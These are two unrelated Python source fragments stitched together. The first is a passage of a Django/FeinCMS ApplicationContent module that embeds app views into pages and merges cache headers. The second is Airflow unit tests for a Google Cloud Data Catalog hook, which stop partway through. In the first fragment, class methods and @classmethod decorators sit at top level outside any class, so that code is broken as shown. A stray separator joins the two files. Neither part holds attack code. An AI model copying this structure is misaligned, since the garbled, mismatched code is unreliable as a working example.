        urls, name = i[0:2]

        if len(i) == 3:
            app_conf = i[2]
            if not isinstance(app_conf, dict):
                raise ValueError(
                    "The third parameter of an APPLICATIONS entry must be"
                    " a dict or the name of one!")
        else:
            app_conf = {}

        cls.ALL_APPS_CONFIG[urls] = {
            "urls": urls,
            "name": name,
            "config": app_conf
        }

    # The admin dropdown's choices come from the registered applications.
    cls.add_to_class(
        'urlconf_path',
        models.CharField(_('application'), max_length=100, choices=[
            (c['urls'], c['name']) for c in cls.ALL_APPS_CONFIG.values()])
    )

    class ApplicationContentItemEditorForm(ItemEditorForm):
        # Item editor form exposing the application's optional custom admin
        # fields; their values are persisted in the 'parameters' JSON blob.
        app_config = {}
        custom_fields = {}

        def __init__(self, *args, **kwargs):
            super(ApplicationContentItemEditorForm, self).__init__(
                *args, **kwargs)

            instance = kwargs.get("instance", None)
            if instance:
                try:
                    # TODO use urlconf_path from POST if set
                    # urlconf_path = request.POST.get('...urlconf_path',
                    #     instance.urlconf_path)
                    self.app_config = cls.ALL_APPS_CONFIG[
                        instance.urlconf_path]['config']
                except KeyError:
                    self.app_config = {}

                self.custom_fields = {}
                admin_fields = self.app_config.get('admin_fields', {})

                if isinstance(admin_fields, dict):
                    self.custom_fields.update(admin_fields)
                else:
                    # 'admin_fields' may also be the dotted path of a
                    # callable returning the fields dict.
                    get_fields = get_object(admin_fields)
                    self.custom_fields.update(
                        get_fields(self, *args, **kwargs))

                # Seed each custom field's initial value from the stored
                # parameters of this content instance.
                params = self.instance.parameters
                for k, v in self.custom_fields.items():
                    v.initial = params.get(k)
                    self.fields[k] = v
                    if k in params:
                        self.fields[k].initial = params[k]

        def save(self, commit=True, *args, **kwargs):
            # Django ModelForms return the model instance from save. We'll
            # call save with commit=False first to do any necessary work &
            # get the model so we can set .parameters to the values of our
            # custom fields before calling save(commit=True)
            m = super(ApplicationContentItemEditorForm, self).save(
                commit=False, *args, **kwargs)

            m.parameters = dict(
                (k, self.cleaned_data[k])
                for k in self.custom_fields if k in self.cleaned_data)

            if commit:
                m.save(**kwargs)

            return m

    # This provides hooks for us to customize the admin interface for
    # embedded instances:
    cls.feincms_item_editor_form = ApplicationContentItemEditorForm

    # Clobber the app_reverse cache when saving application contents
    # and/or pages
    page_class = cls.parent.field.rel.to
    signals.post_save.connect(cycle_app_reverse_cache, sender=cls)
    signals.post_delete.connect(cycle_app_reverse_cache, sender=cls)
    signals.post_save.connect(cycle_app_reverse_cache, sender=page_class)
    signals.post_delete.connect(cycle_app_reverse_cache, sender=page_class)
def __init__(self, *args, **kwargs):
    """Initialize the content and cache its application configuration.

    ``app_config`` is resolved once from ALL_APPS_CONFIG using this
    instance's urlconf_path; missing entries yield an empty dict.
    """
    super(ApplicationContent, self).__init__(*args, **kwargs)
    entry = self.ALL_APPS_CONFIG.get(self.urlconf_path, {})
    self.app_config = entry.get('config', {})
def process(self, request, **kw):
    """Run the embedded application's view for this request.

    Resolves the current path against the app's URLconf, invokes the
    matched view (optionally wrapped via the ``view_wrapper`` config
    hook) and captures the rendered markup and relevant headers on
    ``self`` for later rendering.

    Returns the HttpResponse itself when it must bypass page embedding
    (see send_directly()); otherwise returns True on success. Raises
    Resolver404 when the path cannot be resolved.
    """
    page_url = self.parent.get_absolute_url()

    # Provide a way for appcontent items to customize URL processing by
    # altering the perceived path of the page:
    if "path_mapper" in self.app_config:
        path_mapper = get_object(self.app_config["path_mapper"])
        path, page_url = path_mapper(
            request.path,
            page_url,
            appcontent_parameters=self.parameters
        )
    else:
        path = request._feincms_extra_context['extra_path']

    # Resolve the module holding the application urls.
    urlconf_path = self.app_config.get('urls', self.urlconf_path)

    try:
        fn, args, kwargs = resolve(path, urlconf_path)
    except (ValueError, Resolver404):
        raise Resolver404(str('Not found (resolving %r in %r failed)') % (
            path, urlconf_path))

    # Variables from the ApplicationContent parameters are added to request
    # so we can expose them to our templates via the appcontent_parameters
    # context_processor
    request._feincms_extra_context.update(self.parameters)

    # Save the application configuration for reuse elsewhere
    request._feincms_extra_context.update({
        'app_config': dict(
            self.app_config,
            urlconf_path=self.urlconf_path,
        ),
    })

    view_wrapper = self.app_config.get("view_wrapper", None)
    if view_wrapper:
        # Wrap the resolved view so the app can intercept the call.
        fn = partial(
            get_object(view_wrapper),
            view=fn,
            appcontent_parameters=self.parameters
        )

    output = fn(request, *args, **kwargs)

    if isinstance(output, HttpResponse):
        if self.send_directly(request, output):
            return output
        elif output.status_code == 200:
            if self.unpack(request, output) and 'view' in kw:
                # Handling of @unpack and UnpackTemplateResponse
                kw['view'].template_name = output.template_name
                kw['view'].request._feincms_extra_context.update(
                    output.context_data)
            else:
                # If the response supports deferred rendering, render the
                # response right now. We do not handle template response
                # middleware.
                if hasattr(output, 'render') and callable(output.render):
                    output.render()

                self.rendered_result = mark_safe(
                    output.content.decode('utf-8'))
                self.rendered_headers = {}

                # Copy relevant headers for later perusal
                for h in ('Cache-Control', 'Last-Modified', 'Expires'):
                    if h in output:
                        self.rendered_headers.setdefault(
                            h, []).append(output[h])
    elif isinstance(output, tuple) and 'view' in kw:
        # (template_name, context) tuple returned by the view.
        kw['view'].template_name = output[0]
        kw['view'].request._feincms_extra_context.update(output[1])
    else:
        self.rendered_result = mark_safe(output)

    return True  # successful
def send_directly(self, request, response):
    """Decide whether *response* must bypass page embedding and be
    returned to the client unchanged.

    True for non-200 responses, AJAX requests, responses flagged
    ``standalone``, and any content type other than text/html or
    text/plain.
    """
    content_type = response.get('Content-Type', 'text/plain')
    if ';' in content_type:
        content_type = content_type.split(';')[0]
    content_type = content_type.strip()

    if response.status_code != 200:
        return True
    if request.is_ajax():
        return True
    if getattr(response, 'standalone', False):
        return True
    return content_type not in ('text/html', 'text/plain')
def unpack(self, request, response):
    """Report whether *response* requested unpacking into the page view
    (the ``_feincms_unpack`` marker attribute); defaults to False."""
    try:
        return response._feincms_unpack
    except AttributeError:
        return False
def render(self, **kwargs):
    """Return the markup captured by process(), or '' when nothing was
    rendered (e.g. the response was sent directly)."""
    try:
        return self.rendered_result
    except AttributeError:
        return ''
def finalize(self, request, response):
    """Copy any headers remembered during process() onto *response*."""
    collected = getattr(self, 'rendered_headers', None)
    if not collected:
        return
    self._update_response_headers(request, response, collected)
def _update_response_headers(self, request, response, headers):
    """
    Combine all headers that were set by the different content types
    We are interested in Cache-Control, Last-Modified, Expires
    """
    # Ideally, for the Cache-Control header, we'd want to do some
    # intelligent combining, but that's hard. Let's just collect and unique
    # them and let the client worry about that.
    # NOTE: joining a set below means the directive order in the emitted
    # Cache-Control header is unspecified.
    cc_headers = set(('must-revalidate',))
    for x in (cc.split(",") for cc in headers.get('Cache-Control', ())):
        cc_headers |= set((s.strip() for s in x))

    if len(cc_headers):
        response['Cache-Control'] = ", ".join(cc_headers)
    else:  # Default value
        response['Cache-Control'] = 'no-cache, must-revalidate'

    # Check all Last-Modified headers, choose the latest one
    lm_list = [parsedate(x) for x in headers.get('Last-Modified', ())]
    if len(lm_list) > 0:
        response['Last-Modified'] = http_date(mktime(max(lm_list)))

    # Check all Expires headers, choose the earliest one
    lm_list = [parsedate(x) for x in headers.get('Expires', ())]
    if len(lm_list) > 0:
        response['Expires'] = http_date(mktime(min(lm_list)))
@classmethod
def app_reverse_cache_key(cls, urlconf_path, **kwargs):
    """Return the cache key under which app_reverse() results for
    *urlconf_path* are stored.

    The key incorporates the site id, the active language and a
    "generation" counter so that cycle_app_reverse_cache() can
    invalidate all keys at once.
    """
    # Fix: the first parameter of a @classmethod is conventionally named
    # `cls`, not `self` (PEP 8); the binding is caller-invisible.
    cache_generation = cache.get(APP_REVERSE_CACHE_GENERATION_KEY)
    if cache_generation is None:
        # This might never happen. Still, better be safe than sorry.
        cache_generation = cycle_app_reverse_cache()

    return 'FEINCMS:%s:APPCONTENT:L%s:U%s:G%s' % (
        getattr(settings, 'SITE_ID', 0),
        get_language(),
        urlconf_path,
        cache_generation)
@classmethod
def closest_match(cls, urlconf_path):
    """Return the ApplicationContent for *urlconf_path* whose parent
    page best matches the active language, or None.

    Among all contents with this urlconf_path on active pages, prefers
    the one whose parent page shares the current short language code;
    otherwise falls back to the first by primary key.
    """
    page_class = cls.parent.field.rel.to

    contents = cls.objects.filter(
        parent__in=page_class.objects.active(),
        urlconf_path=urlconf_path,
    ).order_by('pk').select_related('parent')

    if len(contents) > 1:
        try:
            # Pick the first content whose page language matches the
            # currently active language.
            current = short_language_code(get_language())

            return [
                content for content in contents if
                short_language_code(content.parent.language) == current
            ][0]
        except (AttributeError, IndexError):
            pass

    try:
        return contents[0]
    except IndexError:
        pass

    return None
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import re
from copy import deepcopy
from typing import Dict, Sequence, Tuple
from unittest import TestCase, mock
import pytest
from google.api_core.retry import Retry
from google.cloud.datacatalog import CreateTagRequest, CreateTagTemplateRequest, Entry, Tag, TagTemplate
from google.protobuf.field_mask_pb2 import FieldMask
from airflow import AirflowException
from airflow.providers.google.cloud.hooks.datacatalog import CloudDataCatalogHook
from tests.providers.google.cloud.utils.base_gcp_mock import (
mock_base_gcp_hook_default_project_id,
mock_base_gcp_hook_no_default_project_id,
)
# --- Shared fixture values used by the Data Catalog hook tests below ---

# Connection / call plumbing.
TEST_GCP_CONN_ID: str = "test-gcp-conn-id"
TEST_DELEGATE_TO: str = "test-delegate-to"
TEST_LOCATION: str = "europe-west-3b"
TEST_ENTRY_ID: str = "test-entry-id"
TEST_ENTRY: Dict = {}
TEST_RETRY: Retry = Retry()
TEST_TIMEOUT: float = 4
TEST_METADATA: Sequence[Tuple[str, str]] = ()

# Entry groups, tags and tag templates.
TEST_ENTRY_GROUP_ID: str = "test-entry-group-id"
TEST_ENTRY_GROUP: Dict = {}
TEST_TAG: Dict = {}
TEST_TAG_TEMPLATE_ID: str = "test-tag-template-id"
TEST_TAG_TEMPLATE: Dict = {"name": TEST_TAG_TEMPLATE_ID}
TEST_TAG_TEMPLATE_FIELD_ID: str = "test-tag-template-field-id"
TEST_TAG_TEMPLATE_FIELD: Dict = {}
TEST_FORCE: bool = False
TEST_READ_MASK: FieldMask = FieldMask(paths=["name"])
TEST_RESOURCE: str = "test-resource"
TEST_PAGE_SIZE: int = 50
TEST_LINKED_RESOURCE: str = "test-linked-resource"
TEST_SQL_RESOURCE: str = "test-sql-resource"
TEST_NEW_TAG_TEMPLATE_FIELD_ID: str = "test-new-tag-template-field-id"
TEST_SCOPE: Dict = {"include_project_ids": ["example-scope-project"]}
TEST_QUERY: str = "test-query"
TEST_ORDER_BY: str = "test-order-by"
TEST_UPDATE_MASK: Dict = {"fields": ["name"]}
TEST_PARENT: str = "test-parent"
TEST_NAME: str = "test-name"
TEST_TAG_ID: str = "test-tag-id"

# Resource-name templates; `{}` is filled with the project id per test.
TEST_LOCATION_PATH: str = f"projects/{{}}/locations/{TEST_LOCATION}"
TEST_ENTRY_PATH: str = (
    f"projects/{{}}/locations/{TEST_LOCATION}/entryGroups/{TEST_ENTRY_GROUP_ID}/entries/{TEST_ENTRY_ID}"
)
TEST_ENTRY_GROUP_PATH: str = f"projects/{{}}/locations/{TEST_LOCATION}/entryGroups/{TEST_ENTRY_GROUP_ID}"
TEST_TAG_TEMPLATE_PATH: str = f"projects/{{}}/locations/{TEST_LOCATION}/tagTemplates/{TEST_TAG_TEMPLATE_ID}"
TEST_TAG_TEMPLATE_FIELD_PATH: str = (
    f"projects/{{}}/locations/{TEST_LOCATION}/tagTemplates/"
    + f"{TEST_TAG_TEMPLATE_ID}/fields/{TEST_TAG_TEMPLATE_FIELD_ID}"
)
TEST_TAG_PATH: str = (
    f"projects/{{}}/locations/{TEST_LOCATION}/entryGroups/{TEST_ENTRY_GROUP_ID}"
    + f"/entries/{TEST_ENTRY_ID}/tags/{TEST_TAG_ID}"
)

TEST_PROJECT_ID_1 = "example-project-1"
TEST_PROJECT_ID_2 = "example-project-2"
TEST_CREDENTIALS = mock.MagicMock()
class TestCloudDataCatalog(TestCase):
    """Tests for CloudDataCatalogHook methods whose requests do not embed
    a project id (entry lookup and catalog search)."""

    def setUp(
        self,
    ) -> None:
        # Replace the hook's __init__ so no real GCP credentials are needed.
        with mock.patch(
            "airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.__init__",
            new=mock_base_gcp_hook_default_project_id,
        ):
            self.hook = CloudDataCatalogHook(gcp_conn_id="test")

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_lookup_entry_with_linked_resource(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.lookup_entry(
            linked_resource=TEST_LINKED_RESOURCE,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.lookup_entry.assert_called_once_with(
            request=dict(linked_resource=TEST_LINKED_RESOURCE),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_lookup_entry_with_sql_resource(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.lookup_entry(
            sql_resource=TEST_SQL_RESOURCE, retry=TEST_RETRY, timeout=TEST_TIMEOUT, metadata=TEST_METADATA
        )
        mock_get_conn.return_value.lookup_entry.assert_called_once_with(
            request=dict(sql_resource=TEST_SQL_RESOURCE),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_lookup_entry_without_resource(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        # Neither linked_resource nor sql_resource given: must raise.
        with pytest.raises(
            AirflowException, match=re.escape("At least one of linked_resource, sql_resource should be set.")
        ):
            self.hook.lookup_entry(retry=TEST_RETRY, timeout=TEST_TIMEOUT, metadata=TEST_METADATA)

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_search_catalog(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.search_catalog(
            scope=TEST_SCOPE,
            query=TEST_QUERY,
            page_size=TEST_PAGE_SIZE,
            order_by=TEST_ORDER_BY,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.search_catalog.assert_called_once_with(
            request=dict(
                scope=TEST_SCOPE, query=TEST_QUERY, page_size=TEST_PAGE_SIZE, order_by=TEST_ORDER_BY
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
class TestCloudDataCatalogWithDefaultProjectIdHook(TestCase):
    """Tests for CloudDataCatalogHook where the project id comes from the
    connection's default (TEST_PROJECT_ID_1 via the mocked credentials),
    so the tests never pass project_id explicitly."""

    def setUp(
        self,
    ) -> None:
        # Replace the hook's __init__ so no real GCP credentials are needed.
        with mock.patch(
            "airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.__init__",
            new=mock_base_gcp_hook_default_project_id,
        ):
            self.hook = CloudDataCatalogHook(gcp_conn_id="test")

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.create_entry(
            location=TEST_LOCATION,
            entry_group=TEST_ENTRY_GROUP_ID,
            entry_id=TEST_ENTRY_ID,
            entry=TEST_ENTRY,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.create_entry.assert_called_once_with(
            request=dict(
                parent=TEST_ENTRY_GROUP_PATH.format(TEST_PROJECT_ID_1),
                entry_id=TEST_ENTRY_ID,
                entry=TEST_ENTRY,
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.create_entry_group(
            location=TEST_LOCATION,
            entry_group_id=TEST_ENTRY_GROUP_ID,
            entry_group=TEST_ENTRY_GROUP,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.create_entry_group.assert_called_once_with(
            request=dict(
                parent=TEST_LOCATION_PATH.format(TEST_PROJECT_ID_1),
                entry_group_id=TEST_ENTRY_GROUP_ID,
                entry_group=TEST_ENTRY_GROUP,
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        # deepcopy: the hook mutates the tag dict, keep the fixture clean.
        self.hook.create_tag(
            location=TEST_LOCATION,
            entry_group=TEST_ENTRY_GROUP_ID,
            entry=TEST_ENTRY_ID,
            tag=deepcopy(TEST_TAG),
            template_id=TEST_TAG_TEMPLATE_ID,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.create_tag.assert_called_once_with(
            request=CreateTagRequest(
                parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_1),
                tag=Tag(template=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1)),
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_tag_protobuff(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        # Same as test_create_tag, but passing a protobuf Tag message.
        self.hook.create_tag(
            location=TEST_LOCATION,
            entry_group=TEST_ENTRY_GROUP_ID,
            entry=TEST_ENTRY_ID,
            tag=Tag(),
            template_id=TEST_TAG_TEMPLATE_ID,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.create_tag.assert_called_once_with(
            request=CreateTagRequest(
                parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_1),
                tag=Tag(template=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1)),
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.create_tag_template(
            location=TEST_LOCATION,
            tag_template_id=TEST_TAG_TEMPLATE_ID,
            tag_template=TEST_TAG_TEMPLATE,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.create_tag_template.assert_called_once_with(
            request=CreateTagTemplateRequest(
                parent=TEST_LOCATION_PATH.format(TEST_PROJECT_ID_1),
                tag_template_id=TEST_TAG_TEMPLATE_ID,
                tag_template=TEST_TAG_TEMPLATE,
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.create_tag_template_field(
            location=TEST_LOCATION,
            tag_template=TEST_TAG_TEMPLATE_ID,
            tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
            tag_template_field=TEST_TAG_TEMPLATE_FIELD,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.create_tag_template_field.assert_called_once_with(
            request=dict(
                parent=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1),
                tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
                tag_template_field=TEST_TAG_TEMPLATE_FIELD,
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_delete_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.delete_entry(
            location=TEST_LOCATION,
            entry_group=TEST_ENTRY_GROUP_ID,
            entry=TEST_ENTRY_ID,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.delete_entry.assert_called_once_with(
            request=dict(
                name=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_1),
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_delete_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.delete_entry_group(
            location=TEST_LOCATION,
            entry_group=TEST_ENTRY_GROUP_ID,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.delete_entry_group.assert_called_once_with(
            request=dict(
                name=TEST_ENTRY_GROUP_PATH.format(TEST_PROJECT_ID_1),
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_delete_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.delete_tag(
            location=TEST_LOCATION,
            entry_group=TEST_ENTRY_GROUP_ID,
            entry=TEST_ENTRY_ID,
            tag=TEST_TAG_ID,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.delete_tag.assert_called_once_with(
            request=dict(
                name=TEST_TAG_PATH.format(TEST_PROJECT_ID_1),
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_delete_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.delete_tag_template(
            location=TEST_LOCATION,
            tag_template=TEST_TAG_TEMPLATE_ID,
            force=TEST_FORCE,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.delete_tag_template.assert_called_once_with(
            request=dict(name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1), force=TEST_FORCE),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_delete_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.delete_tag_template_field(
            location=TEST_LOCATION,
            tag_template=TEST_TAG_TEMPLATE_ID,
            field=TEST_TAG_TEMPLATE_FIELD_ID,
            force=TEST_FORCE,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.delete_tag_template_field.assert_called_once_with(
            request=dict(
                name=TEST_TAG_TEMPLATE_FIELD_PATH.format(TEST_PROJECT_ID_1),
                force=TEST_FORCE,
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_get_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.get_entry(
            location=TEST_LOCATION,
            entry_group=TEST_ENTRY_GROUP_ID,
            entry=TEST_ENTRY_ID,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.get_entry.assert_called_once_with(
            request=dict(
                name=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_1),
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_get_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.get_entry_group(
            location=TEST_LOCATION,
            entry_group=TEST_ENTRY_GROUP_ID,
            read_mask=TEST_READ_MASK,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.get_entry_group.assert_called_once_with(
            request=dict(
                name=TEST_ENTRY_GROUP_PATH.format(TEST_PROJECT_ID_1),
                read_mask=TEST_READ_MASK,
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_get_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.get_tag_template(
            location=TEST_LOCATION,
            tag_template=TEST_TAG_TEMPLATE_ID,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.get_tag_template.assert_called_once_with(
            request=dict(
                name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1),
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_list_tags(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
